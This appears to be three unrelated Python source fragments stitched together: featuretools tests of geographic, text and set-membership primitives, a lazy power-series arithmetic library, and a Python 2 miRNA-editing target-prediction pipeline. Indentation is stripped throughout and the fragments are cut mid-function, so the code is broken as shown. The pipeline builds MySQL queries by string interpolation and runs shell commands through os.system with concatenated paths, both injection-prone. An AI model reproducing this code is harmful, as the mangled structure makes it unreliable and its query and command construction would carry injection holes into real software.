latvalues = fm[latitude.get_name()].values
lonvalues = fm[longitude.get_name()].values
assert len(latvalues) == 17
assert len(lonvalues) == 17
real_lats = [np.nan, 10, np.nan, np.nan, 20, 0, 1, 2, 3, 0, 0, 5, 0, 7, 14, np.nan, np.nan]
real_lons = [np.nan, np.nan, 4, np.nan, 8, 0, 1, 2, 3, 0, 0, 2, 0, 3, 6, np.nan, np.nan]
assert np.allclose(latvalues, real_lats, atol=0.0001, equal_nan=True)
assert np.allclose(lonvalues, real_lons, atol=0.0001, equal_nan=True)
def test_haversine(pd_es):
log_latlong_feat = ft.Feature(pd_es['log'].ww['latlong'])
log_latlong_feat2 = ft.Feature(pd_es['log'].ww['latlong2'])
haversine = ft.Feature([log_latlong_feat, log_latlong_feat2],
primitive=Haversine)
features = [haversine]
df = ft.calculate_feature_matrix(entityset=pd_es, features=features,
instance_ids=range(15))
values = df[haversine.get_name()].values
real = [0, 525.318462, 1045.32190304, 1554.56176802, 2047.3294327, 0,
138.16578931, 276.20524822, 413.99185444, 0, 0, 525.318462, 0,
741.57941183, 1467.52760175]
assert len(values) == 15
assert np.allclose(values, real, atol=0.0001)
haversine = ft.Feature([log_latlong_feat, log_latlong_feat2],
primitive=Haversine(unit='kilometers'))
features = [haversine]
df = ft.calculate_feature_matrix(entityset=pd_es, features=features,
instance_ids=range(15))
values = df[haversine.get_name()].values
real_km = [0, 845.41812212, 1682.2825471, 2501.82467535, 3294.85736668,
0, 222.35628593, 444.50926278, 666.25531268, 0, 0,
845.41812212, 0, 1193.45638714, 2361.75676089]
assert len(values) == 15
assert np.allclose(values, real_km, atol=0.0001)
error_text = "Invalid unit inches provided. Must be one of"
with pytest.raises(ValueError, match=error_text):
Haversine(unit='inches')
def test_haversine_with_nan(pd_es):
# Check some `nan` values
df = pd_es['log']
df['latlong'][0] = np.nan
df['latlong'][1] = (10, np.nan)
pd_es.replace_dataframe(dataframe_name='log', df=df)
log_latlong_feat = ft.Feature(pd_es['log'].ww['latlong'])
log_latlong_feat2 = ft.Feature(pd_es['log'].ww['latlong2'])
haversine = ft.Feature([log_latlong_feat, log_latlong_feat2],
primitive=Haversine)
features = [haversine]
df = ft.calculate_feature_matrix(entityset=pd_es, features=features)
values = df[haversine.get_name()].values
real = [np.nan, np.nan, 1045.32190304, 1554.56176802, 2047.3294327, 0,
138.16578931, 276.20524822, 413.99185444, 0, 0, 525.318462, 0,
741.57941183, 1467.52760175, np.nan, np.nan]
assert np.allclose(values, real, atol=0.0001, equal_nan=True)
# Check all `nan` values
df = pd_es['log']
df['latlong2'] = np.nan
pd_es.replace_dataframe(dataframe_name='log', df=df)
log_latlong_feat = ft.Feature(pd_es['log'].ww['latlong'])
log_latlong_feat2 = ft.Feature(pd_es['log'].ww['latlong2'])
haversine = ft.Feature([log_latlong_feat, log_latlong_feat2],
primitive=Haversine)
features = [haversine]
df = ft.calculate_feature_matrix(entityset=pd_es, features=features)
values = df[haversine.get_name()].values
real = [np.nan] * pd_es['log'].shape[0]
assert np.allclose(values, real, atol=0.0001, equal_nan=True)
def test_text_primitives(es):
words = ft.Feature(es['log'].ww['comments'], primitive=NumWords)
chars = ft.Feature(es['log'].ww['comments'], primitive=NumCharacters)
features = [words, chars]
df = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=range(15)),
index='id',
sort_index=True)
word_counts = [514, 3, 3, 644, 1268, 1269, 177, 172, 79,
240, 1239, 3, 3, 3, 3]
char_counts = [3392, 10, 10, 4116, 7961, 7580, 992, 957,
437, 1325, 6322, 10, 10, 10, 10]
word_values = df[words.get_name()].values
char_values = df[chars.get_name()].values
assert len(word_values) == 15
for i, v in enumerate(word_values):
assert v == word_counts[i]
for i, v in enumerate(char_values):
assert v == char_counts[i]
def test_isin_feat(es):
isin = ft.Feature(es['log'].ww['product_id'], primitive=IsIn(list_of_outputs=["toothpaste", "coke zero"]))
features = [isin]
df = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=range(8)),
index='id',
sort_index=True)
true = [True, True, True, False, False, True, True, True]
v = df[isin.get_name()].tolist()
assert true == v
def test_isin_feat_other_syntax(es):
isin = ft.Feature(es['log'].ww['product_id']).isin(["toothpaste", "coke zero"])
features = [isin]
df = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=range(8)),
index='id',
sort_index=True)
true = [True, True, True, False, False, True, True, True]
v = df[isin.get_name()].tolist()
assert true == v
def test_isin_feat_other_syntax_int(es):
isin = ft.Feature(es['log'].ww['value']).isin([5, 10])
features = [isin]
df = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=range(8)),
index='id',
sort_index=True)
true = [False, True, True, False, False, False, False, False]
v = df[isin.get_name()].tolist()
assert true == v
def test_isin_feat_custom(es):
def pd_is_in(array, list_of_outputs=None):
if list_of_outputs is None:
list_of_outputs = []
return array.isin(list_of_outputs)
def isin_generate_name(self, base_feature_names):
return u"%s.isin(%s)" % (base_feature_names[0],
str(self.kwargs['list_of_outputs']))
IsIn = make_trans_primitive(
pd_is_in,
[ColumnSchema()],
ColumnSchema(logical_type=Boolean),
name="is_in",
description="For each value of the base feature, checks whether it is "
"in a list that is provided.",
cls_attributes={"generate_name": isin_generate_name})
isin = ft.Feature(es['log'].ww['product_id'], primitive=IsIn(list_of_outputs=["toothpaste", "coke zero"]))
features = [isin]
df = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=range(8)),
index='id',
sort_index=True)
true = [True, True, True, False, False, True, True, True]
v = df[isin.get_name()].tolist()
assert true == v
isin = ft.Feature(es['log'].ww['product_id']).isin(["toothpaste", "coke zero"])
features = [isin]
df = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=range(8)),
index='id',
sort_index=True)
true = [True, True, True, False, False, True, True, True]
v = df[isin.get_name()].tolist()
assert true == v
isin = ft.Feature(es['log'].ww['value']).isin([5, 10])
features = [isin]
df = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=range(8)),
index='id',
sort_index=True)
true = [False, True, True, False, False, False, False, False]
v = df[isin.get_name()].tolist()
assert true == v
def test_isnull_feat(pd_es):
value = ft.Feature(pd_es['log'].ww['value'])
diff = ft.Feature(value, groupby=ft.Feature(pd_es['log'].ww['session_id']), primitive=Diff)
isnull = ft.Feature(diff, primitive=IsNull)
features = [isnull]
df = ft.calculate_feature_matrix(entityset=pd_es, features=features, instance_ids=range(15))
correct_vals = [True, False, False, False, False, True, False, False,
False, True, True, False, True, False, False]
values = df[isnull.get_name()].tolist()
assert correct_vals == values
def test_percentile(pd_es):
v = ft.Feature(pd_es['log'].ww['value'])
p = ft.Feature(v, primitive=Percentile)
feature_set = FeatureSet([p])
calculator = FeatureSetCalculator(pd_es, feature_set)
df = calculator.run(np.array(range(10, 17)))
true = pd_es['log'][v.get_name()].rank(pct=True)
true = true.loc[range(10, 17)]
for t, a in zip(true.values, df[p.get_name()].values):
assert (pd.isnull(t) and pd.isnull(a)) or t == a
def test_dependent_percentile(pd_es):
v = ft.Feature(pd_es['log'].ww['value'])
p = ft.Feature(v, primitive=Percentile)
p2 = ft.Feature(p - 1, primitive=Percentile)
feature_set = FeatureSet([p, p2])
calculator = FeatureSetCalculator(pd_es, feature_set)
df = calculator.run(np.array(range(10, 17)))
true = pd_es['log'][v.get_name()].rank(pct=True)
true = true.loc[range(10, 17)]
| |
<filename>pwrsrs.py
from fractions import Fraction as F
from itertools import count, islice, repeat, chain, starmap
import math
try:
from itertools import izip as zip
from itertools import imap as map
except ImportError: # will be 3.x series
pass
pstestlimit = 5
def memoizedGenerator( gen ):
_iter = gen()
_cache = []
def _gen():
for n in count():
if n < len(_cache):
yield _cache[n]
else:
term = next(_iter)
_cache.append(term)
yield term
return _gen
def num_to_str( term ):
if isinstance(term, float):
return "\t% .3e" % term
else:
return "\t"+str(term)
class PowerSeries(object):
def __init__(self, g=None):
self.__g = g
def __eq__(self, entry):
print("Warning: comparing powerseries!")
return Equal( self, entry )
def __iter__( self ):
return self.__g() if self.__g else repeat(0)
def __str__(self):
return self.getstr()
def getstr(self, nums=[], term_to_str=num_to_str):
def gen_str():
if isinstance(nums, int):
n = nums
r = nums
else:
n = nums[0] if nums else pstestlimit
r = nums[1:] if nums else []
is_pps = isinstance(self.zero, PowerSeries)
for term in islice(self, n):
if is_pps:
yield term.getstr(r) + "\n"
else:
yield term_to_str(term) + ", "
return "".join(gen_str()) + "..."
def __getitem__(self, key):
"""
Access items of power series with an index or a slice.
Warning: Access by slice just returns a slice and not
a list or tuple.
Use list(P[:10]) to get a list of the first 10 coefficients.
"""
if isinstance(key, slice):
return islice(self, key.start, key.stop, key.step)
else:
return next(islice(self, key, None))
def deep_map( self, func, n=1 ):
"""
Helper function, which maps a function to the power
series at nestedness level n. Deep_maps is essentially
an iterated map function used to handle the multivariate
power series.
"""
if n == 0:
return func(self)
if n == 1:
@memoizedGenerator
def _deep_map():
return map( func, self )
return PowerSeries( _deep_map )
else:
return self.deep_map( lambda x: x.deep_map(func, n-1) )
@property
def ord2exp(self):
"""
Converts an ordinary generating function to an
exponential generating function.
Example:
>>> Equal((1/(1-X)).ord2exp, exp(X))
True
"""
def _ord2exp(f=1):
for n,term in enumerate(self):
yield F(term, f)
f*= n+1
return PowerSeries(_ord2exp)
@property
def exp2ord(self):
"""
Converts an exponential generating function to an
ordinary generating function.
Example:
>>> Equal(exp(X).exp2ord, 1/(1-X))
True
"""
def _exp2ord(f=1):
for n,term in enumerate(self):
yield term * f
f*= n+1
return PowerSeries(_exp2ord)
@property
def zero(self):
"""
Returns the constant term of the power series.
"""
for term in self:
return term
@property
def tail(self):
"""
Returns everything except the constant term as a
new power series.
"""
def _tail():
return islice(self, 1, None)
return PowerSeries(_tail)
@property
def xmul(self):
"""
Shifts the coefficients of the power series P by one
term such that P.xmul has 0 as constant term.
"""
def _xmul():
return chain( ( self.zero*0,), self )
return PowerSeries(_xmul)
def __add__(self, entry):
"""
Implements power series addition.
"""
if is_powerseries(entry):
@memoizedGenerator
def _add():
return starmap( lambda a,b: a+b, zip( self, entry ) )
else:
def _add():
return chain( map( lambda a: a+entry, islice(self, 0, 1) ), islice(self, 1, None) )
return PowerSeries(_add)
__radd__ = __add__
def __sub__(self, entry):
return self + (-entry)
def __rsub__(self, entry):
return entry + (-self)
def __neg__(self):
return self.deep_map( lambda x: -x )
def __mul__(self, entry):
"""
Implements multiplication of power series. Only minor
modifications were necessary in P. Donis original code
to handle multivariate power series.
Example:
>>> Equal((exp(X-Z)/(1-X)) * (exp(Y+Z)/(1-Y)), exp(X+Y)/(1-X-Y+X*Y))
True
"""
if not is_powerseries(entry):
if entry == 1:
return self
elif entry == 0:
if is_powerseries(self.zero):
z = self.zero*0
def _z():
return repeat( z )
return PowerSeries(_z)
else:
return PowerSeries()
else:
return self.deep_map( lambda x: x*entry )
@memoizedGenerator
def _mul():
f0 = self.zero
g0 = entry.zero
yield f0 * g0
F = self.tail
G = entry.tail
mterms = [(F * G).xmul]
if is_powerseries(f0) or f0 != 0:
f0G = G.deep_map( lambda x: x*f0 )
mterms.append(f0G)
if is_powerseries(g0) or g0 != 0:
g0F = F.deep_map( lambda x: x*g0 )
mterms.append(g0F)
for terms in zip(*mterms):
yield sum(terms)
return PowerSeries(_mul)
__rmul__ = __mul__
def __truediv__(self, entry):
if is_powerseries(entry):
return entry.__rtruediv__(self)
elif entry == 1:
return self
elif entry == 0:
raise ValueError("Zero division error")
else:
return self * (F(1, 1) / entry)
def __rtruediv__(self, entry):
"""
Implements division of power series P/Q. If Q has
an integer constant term != 1, the P/Q will be given
as a power series of Fractions even if P is an integer
power series.
Examples:
>>> A = 10/ (1 - X)
>>> Equal(A, 1/(1-X) * 10 )
True
>>> B = 1 / (1 - X - X*Y)
>>> Equal(1/B, 1-X-X*Y)
True
>>> C = 100*solve( Y - X*exp(X) )[0].tail
>>> Equal( C/C, 1 )
True
"""
@memoizedGenerator
def _rdiv():
f0 = self.zero
if isinstance(f0, int):
recip = F(1, f0)
else:
recip = 1 / f0
if not is_powerseries(entry):
yield entry * recip
for term in ( (self.tail * R).deep_map( lambda x: -x*recip ) ):
yield term
else:
yield entry.zero * recip
for term in ( (entry.tail-self.tail * R).deep_map( lambda x: x*recip ) ):
yield term
R = PowerSeries(_rdiv)
return R
__div__ = __truediv__
__rdiv__ = __rtruediv__
def __pow__( self, alpha ):
"""
Implements taking powers of power series. For positive integers
as arguments where are no restrictions on the power series. For all
other exponents the power series needs to have a non-zero constant
coefficient. This function is based on P. Donis' code.
Examples:
>>> Equal(X**0, I)
True
>>> Equal(X*X, X**2)
True
>>> Equal( log((1/(1+X))**(F(3,2))), -F(3,2)*log(1+X))
True
>>> Equal(exp( X + 3*Y )**F(-4,7), exp( -F(4,7) * (X + 3*Y) ))
True
"""
f0 = self.zero
if not is_powerseries(f0) and f0 == 0:
if isinstance(alpha, int) and alpha >= 0:
if alpha == 0:
return self*0 + 1
@memoizedGenerator
def _pow():
for e in repeat(0, alpha):
yield e
for term in self.tail ** alpha:
yield term
return PowerSeries(_pow)
else:
raise ValueError("Can't raise powerseries with vanishing first term to non positive integer power")
c0 = self.zero**alpha if is_powerseries(self.zero) or self.zero != 1 else 1
@memoizedGenerator
def _pow():
for term in integral(alpha * P * D(self) / self, c0 ):
yield term
P = PowerSeries(_pow)
return P
def compose(self, *args):
"""
Implements general power series composition. The first
argument is composed with the first variable or nestedness
level, the second with the second nestedness level and so on.
In power series symbols, compose with
arguments f_1, ..., f_n calculates
P( f_1(x,y,z), ..., f_n(x,y,z), x, y, z, ...)
Note that we continue with x,y,z if we have more variables
then arguments.
For instance,
>>> P = X + 3*Y
>>> Equal( P(Y, exp(X)-1), Y + 3*exp(X)-3 )
True
Composition can also be used to shuffle the variables of power
series if necessary:
>>> P = X*exp(Y)
>>> Equal( P(Y, X), Y*exp(X) )
True
Furthermore we can reduce the depth of the powerseries by
associating different variables.
>>> Equal( P(X,X), X*exp(X) )
True
Note that P(X) gives the same result as P(X,X) if P is a bivariate
power series.
Examples:
>>> Equal((1/(1-X-X*Y))(X,X), 1/(1-X-X**2))
True
>>> A = exp(X)
>>> B = log(1/(1-X))
>>> Equal( A(B), 1/(1-X) )
True
>>> Equal((1/(1-X-X*Y))(Y,X), 1/(1-Y-Y*X))
True
>>> Equal((1/(1-X-X*Y))(Y), 1/(1-Y-Y*X))
True
>>> Equal((1/(1-X-Z))(X,Y,X*Y), 1/(1-X-X*Y))
True
>>> Equal((1/(1-X))(Y), 1/(1-Y))
True
"""
n = len(args)
try:
k,a = next( ( (k,a) for k,a in enumerate(args) if not is_powerseries(a) ) )
if a == 0:
if n > 1:
return self.deep_map( lambda x: x.zero, k )( *(args[:k] + args[k+1:]) )
else:
return self.zero
else:
raise ValueError("Can't calculate powerseries at non-zero value")
except StopIteration:
pass
get_zero = lambda d: d.zero if is_powerseries(d) else d
get_D = lambda d: D(d) if is_powerseries(d) else 0
@memoizedGenerator
def _compose():
G = ( self.deep_map( | |
Exception, e:
print e
regulated.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tNEW\traw\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t \t \t \t \t'+str(newTPair[key][0])+'\t'+str(newTPair[key][1])+'\t'+utr[newTPair[key][0]-10:newTPair[key][1]+25].strip()+'\n'
result.append(line)
for key, utrSym in enumerate(dieList): #high confidence die targets
utr = getUTR(utrSym)
if utr != 0:
try:
score = editingAnalysis(fasta, utr[dieTPair[key][0]-25:dieTPair[key][1]+20].strip())
if score != 0:
status = score[0]
if status == 1:
item = 'raw'
elif status == 2:
item = 'a2g & a2t'
elif status == 3:
item = 'a2g'
elif status == 4:
item = 'a2t'
else:
return -1
if status == 1:
score = score[1]
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\t'+item+'\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t'+str(score[0])+'\t'+str(score[1])+'\t'+str(score[2])+'\t'+str(score[3])+'\t'+str(dieTPair[key][0])+'\t'+str(dieTPair[key][1])+'\t'+utr[dieTPair[key][0]-10:dieTPair[key][1]+25].strip()+'\n'
result.append(line)
else:
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\traw\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t \t \t \t \t'+str(dieTPair[key][0])+'\t'+str(dieTPair[key][1])+'\t'+utr[dieTPair[key][0]-10:dieTPair[key][1]+25].strip()+'\n'
result.append(line)
else:
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\traw\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t \t \t \t \t'+str(dieTPair[key][0])+'\t'+str(dieTPair[key][1])+'\t'+utr[dieTPair[key][0]-10:dieTPair[key][1]+25].strip()+'\n'
result.append(line)
except:
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\traw\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t \t \t \t \t'+str(dieTPair[key][0])+'\t'+str(dieTPair[key][1])+'\t'+utr[dieTPair[key][0]-10:dieTPair[key][1]+25].strip()+'\n'
result.append(line)
for key, utrSym in enumerate(step2Run):
utr = getUTR(utrSym)
if utr != 0:
try:
score = editingAnalysis(fasta, utr[stepTPair[key][0]-10:stepTPair[key][1]+25].strip())
if score != 0:
status = score[0]
if status == 1:
item = 'raw'
elif status == 2:
item = 'a2g & a2t'
elif status == 3:
item = 'a2g'
elif status == 4:
item = 'a2t'
else:
return -1
if status != 1.0 and status != 0:
score = score[1]
regulated.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tNEW\t'+item+'-so\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t'+str(score[0])+'\t'+str(score[1])+'\t'+str(score[2])+'\t'+str(score[3])+'\t'+str(newTPair[key][0])+'\t'+str(newTPair[key][1])+'\t'+utr[newTPair[key][0]-10:newTPair[key][1]+25].strip()+'\n'
result.append(line)
elif status == 1.0:
score = score[1]
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\t'+item+'-so\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t'+str(score[0])+'\t'+str(score[1])+'\t'+str(score[2])+'\t'+str(score[3])+'\t'+str(dieTPair[key][0])+'\t'+str(dieTPair[key][1])+'\t'+utr[dieTPair[key][0]-10:dieTPair[key][1]+25].strip()+'\n'
result.append(line)
else:
line = mir+'\t'+sig+'\t'+str(jobId)+'\tRAW\t'+item+'\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t \t \t \t \t'+str(stepTPair[key][0])+'\t'+str(stepTPair[key][1])+'\t'+utr[stepTPair[key][0]-10:stepTPair[key][1]+25].strip()+'\n'
result.append(line)
else:
line = mir+'\t'+sig+'\t'+str(jobId)+'\tRAW\traw\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t \t \t \t \t'+str(stepTPair[key][0])+'\t'+str(stepTPair[key][1])+'\t'+utr[stepTPair[key][0]-10:stepTPair[key][1]+25].strip()+'\n'
result.append(line)
except:
line = mir+'\t'+sig+'\t'+str(jobId)+'\tRAW\traw\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t \t \t \t \t'+str(stepTPair[key][0])+'\t'+str(stepTPair[key][1])+'\t'+utr[stepTPair[key][0]-10:stepTPair[key][1]+25].strip()+'\n'
result.append(line)
for key, utrSym in enumerate(tiList):
utr = getUTR(utrSym)
if utr != 0:
try:
score = editingAnalysis(fasta, utr[tIssuePair[key][0]-10:tIssuePair[key][1]+25].strip())
if score != 0:
status = score[0]
if status == 1:
item = 'raw'
elif status == 2:
item = 'a2g & a2t'
elif status == 3:
item = 'a2g'
elif status == 4:
item = 'a2t'
else:
return -1
if status != 1.0 and status != 0:
score = score[1]
regulated.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tNEW\t'+item+'-so\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t'+str(score[0])+'\t'+str(score[1])+'\t'+str(score[2])+'\t'+str(score[3])+'\t'+str(tIssuePair[key][0])+'\t'+str(tIssuePair[key][1])+'\t'+utr[tIssuePair[key][0]-10:tIssuePair[key][1]+25].strip()+'\n'
result.append(line)
elif status == 1.0:
score = score[1]
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\t'+item+'-so\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t'+str(score[0])+'\t'+str(score[1])+'\t'+str(score[2])+'\t'+str(score[3])+'\t'+str(dieTPair[key][0])+'\t'+str(dieTPair[key][1])+'\t'+utr[dieTPair[key][0]-10:dieTPair[key][1]+25].strip()+'\n'
result.append(line)
else:
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\ta2t-so\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t-\t-\t-\t-\t'+str(tIssuePair[key][0])+'\t'+str(tIssuePair[key][1])+'\t'+utr[tIssuePair[key][0]-10:tIssuePair[key][1]+25].strip()+'\n'
result.append(line)
else:
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\ta2t-so\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t-\t-\t-\t-\t'+str(tIssuePair[key][0])+'\t'+str(tIssuePair[key][1])+'\t'+utr[tIssuePair[key][0]-10:tIssuePair[key][1]+25].strip()+'\n'
result.append(line)
except:
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\ta2t\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t-\t-\t-\t-\t'+str(tIssuePair[key][0])+'\t'+str(tIssuePair[key][1])+'\t'+utr[tIssuePair[key][0]-10:tIssuePair[key][1]+25].strip()+'\n'
result.append(line)
fileA = open(outFile, 'w')
fileA.writelines(result)
fileA.close()
query = """LOAD DATA LOCAL INFILE '%s' INTO TABLE %s (`mirna`, `sig`, `job`, `tag`, `way`, `gene_symbol`, `transcript_id`, `dg_duplex`, `dg_binding`, `dg_duplex_seed`, `dg_binding_seed`, `utr_start`, `utr_end`, `utr3`);""" % (outFile, getConfig("datasets", "mirs"))
cursor.execute(query)
cnx.commit()
#new_t, old_t, com_t, dif_t
return len(newList), len(step2Run)+len(dieList), len(step2Run), len(dieList), sig
def loadUTRSeq():
global utrLibrary
tmp = file(getConfig('datasets', 'utrLibrary'), 'rb')
utrLibrary = pickle.load(tmp)
tmp.close()
def loadTGMap():
global tgMapLibrary
tmp = file(getConfig('datasets', 'tgLibrary'), 'rb')
tgMapLibrary = pickle.load(tmp)
tmp.close()
def convertRefGenomeMatureR():
query = "SELECT * FROM miediting WHERE mirna LIKE '%p';"
cursor.execute(query)
for (rec_id, chromosome, position, gene, strand, mirna, seed_pos, annot1, annot2, alu, raw_seq, a2g, a2t, a2c) in cursor:
queryCursor = cnx.cursor()
query = "SELECT start, end FROM mirgenome WHERE chromosome='%s' AND strand='%s' AND start<=%d AND start>=%d" % (chromosome, strand, int(position) - 1, int(position) - 7)
queryCursor.execute(query)
try:
data = queryCursor.fetchall()
if (len(data)):
query = "UPDATE miediting SET seed_pos=%d WHERE rec_id=%d" % (int(position) - int(data[0][0]) , rec_id)
queryCursor.execute(query)
cnx.commit()
except :
print query
def parsemiRanda(file, sig, jobId):
with open(file) as f:
all = f.read()
n = re.sub("{trick}", "\t"+sig+"\t"+str(jobId)+"\t", all)
fw = open(file, "w")
fw.write(n)
fw.close()
def whichMiRNA(chr, pos):
"""Find which miRNA it is"""
global mirTable
miRNA = None
for hit in mirTable.fetch(reference=chr, start=int(pos)-1, end=int(pos), parser=pysam.asGTF()):
chr, source, type, start, end, score, strand, phase, attributes = hit
start = int(start)
end = int(end)
attributes = attributes.split(';')
miRNA = attributes[2].split('=')[1]
seq = attributes[4].split('=')[1]
if miRNA != None:
if strand == '+':
seed = 1 if isInSeedRegion(start, pos, strand) else 0
return (miRNA, start, seed, strand, seq)
else:
seed = 1 if isInSeedRegion(end, pos, strand) else 0
return (miRNA, end, seed, strand, seq)
return 0
def miRanda2gene(file, allList=[]):
test= []
with open(file) as f:
rows = f.readlines()
i = 0
for row in rows:
ele = row.split()
query = "SELECT * FROM utr3 WHERE infasta = '%s';" % ele[4]
cursor.execute(query)
geneSymbol = cursor.fetchone()
if len(allList) > 0:
if geneSymbol:
if geneSymbol[6] not in allList:
continue
if (geneSymbol == None and ele[4] != "NA"):
geneSymbol = "Unknown("+ele[4]+")"
newRows.append(row.replace(ele[4], ele[4].replace("hg38_refGene_","")+"\t"+geneSymbol))
elif ele[4] != "NA" :
newRows.append(row.replace(ele[4], ele[4].replace("hg38_refGene_","")+"\t"+str(geneSymbol[6])))
i = i + 1
fw = open(file, "w")
fw.writelines(newRows)
fw.close()
def isUnexpressed(expressionTable, gene_symbol):
cols = list(expressionTable.columns)
record = expressionTable[expressionTable['gene_short_name'] == gene_symbol]
if 'FPKM' in cols:
value = list(record['FPKM'])
elif 'TPM' in cols:
value = list(record['TPM'])
else:
return 1
if len(value) == 0:
return 2
else:
if float(value[0]) == 0:
return 1
else:
return 0
def diffSetsBymiRanda(file, sig):
mut = []
wt = []
rows = []
taggedWithWay = []
file_handler = open(file, 'r')
rows = file_handler.readlines()
'''
with open(file) as f:
rows = f.readlines()
for row in rows:
row = row.split()
if row[3] == "RAW":
wt.append(row[4])
else:
mut.append(row[4])
'''
for row in rows:
row = row.split()
if row[3] == "RAW":
wt.append(row[4])
else:
mut.append(row[4])
newT = set(mut).difference(set(wt))
dieT = set(wt).difference(set(mut))
comT = set(wt).intersection(set(mut))
for row in rows:
items = row.split('\t')
if items[4] in newT:
regulated.append(items[4])
row = row.replace(items[4], 'NEW\t'+items[4])
elif items[4] in dieT:
released.append(items[4])
row = row.replace(items[4], 'DIE\t'+items[4])
else:
row = row.replace(items[4], 'RAW\t'+items[4])
taggedWithWay.append(row)
fp = open(file, mode='w')
fp.writelines(taggedWithWay)
fp.close()
#mut = list(set(mut))
#wt = list(set(wt))
#a.difference(b) --> in a not in b
#diff = list(set(mut).difference(set(wt)))
#union = list(set(mut).intersection(set(wt)))
#for di in diff:
# query = """INSERT INTO `miranda_diff` (`sig`, `gene_symbol`) VALUES ("%s", "%s");""" % (sig, di)
# cursor.execute(query)
# cnx.commit()
return (len(mut), len(wt), len(comT), len(dieT))
def uniqueTopmiRanda(miRandaOP, newT=[], dieT=[]):
file = open(miRandaOP, 'r')
rawSet = {}
a2gSet = {}
a2tSet = {}
rawIndex = {}
a2gIndex = {}
a2tIndex = {}
uniqueFile = file.readlines()
for k, line in enumerate(uniqueFile):
items = line.split('\t')
if items[3] == 'RAW':
if rawSet.has_key(items[4]):
if rawSet[items[4]] > float(items[5]):
continue
rawSet[items[4]] = float(items[5])
rawIndex[items[4]] = k
elif items[3] == 'I2G':
if a2gSet.has_key(items[4]):
if a2gSet[items[4]] > float(items[5]):
continue
a2gSet[items[4]] = float(items[5])
a2gIndex[items[4]] = k
elif items[3] == 'I2T':
if a2tSet.has_key(items[4]):
if a2tSet[items[4]] > float(items[5]):
continue
a2tSet[items[4]] = float(items[5])
a2tIndex[items[4]] = k
tmp = rawIndex.values()
tmp.extend(a2gIndex.values())
tmp.extend(a2tIndex.values())
tmp.sort()
newFile = open(miRandaOP, 'w')
for lineNum in tmp:
items = uniqueFile[lineNum].split('\t')
if len(dieT) > 0:
if items[4] in dieT and items[3] == 'RAW':
continue
newFile.write(uniqueFile[lineNum])
newFile.close()
def targetsPredictBymiRandaA2I4ML(seqs, utrs, mirnaName, position, chromosome, jobId, inactive=[], newt=[]):
#Set output files
tag = str(time.time())
miFile = path.join(getConfig("dispatch", "mpool"), "mir_"+tag+".fasta")
utrFile = path.join(getConfig("dispatch", "mpool"), "ulib_"+tag+".fasta")
outFile = path.join(getConfig("dispatch", "mpool"), "out_"+tag)
SeqIO.write(seqs, miFile, "fasta")
SeqIO.write(utrs, utrFile, "fasta")
#Run miRanda
os.system(os.path.join(getConfig("program", "miranda")+" "+miFile+" "+utrFile+" -out "+outFile+" -sc 60"))
#Generate a signature for this editing event
sig = sigEngine.generatemiRNASig(mirnaName, position, chromosome, jobId)
parsemiRanda(outFile, sig, jobId)
res = []
uniqueTopmiRanda(outFile, newt, inactive)
new_t, old_t, com_t, dif_t = diffSetsBymiRanda(outFile, sig)
query = """LOAD DATA LOCAL INFILE '%s' INTO TABLE %s (`mirna`, `sig`, `job`, `tag`, `gene_symbol`, `score`, `energy`, `mi_start`, `mi_end`, `utr_start`, `utr_end`, `match_len`, `identity`, `similarity`, `mir_seq`, `lines`, `utr_seq`);""" % (outFile, getConfig("datasets", "mirtargets"))
cursor.execute(query)
cnx.commit()
#delete(outFile)
return new_t, old_t, com_t, dif_t, sig
def targetsPredictBymiRandaA2I(seqs, mirnaName, position, chromosome, jobId, whitelist=[]):
#Set output files
tag = str(time.time())
miFile = path.join(getConfig("dispatch", "mpool"), "mir_"+tag+".fasta")
outFile = path.join(getConfig("dispatch", "mpool"), "out_"+tag)
SeqIO.write(seqs, miFile, "fasta")
#Run miRanda
os.system(os.path.join(getConfig("program", "miranda")+" "+miFile+" "+getConfig("datasets", "utr3")+" -out "+outFile))
#Generate a signature for this editing event
sig = sigEngine.generatemiRNASig(mirnaName, position, chromosome, jobId)
parsemiRanda(outFile, sig, jobId)
uniqueTopmiRanda(outFile)
try:
(new_t, old_t, com_t, dif_t) = diffSetsBymiRanda(outFile, sig)
except :
return 0,0,0,0
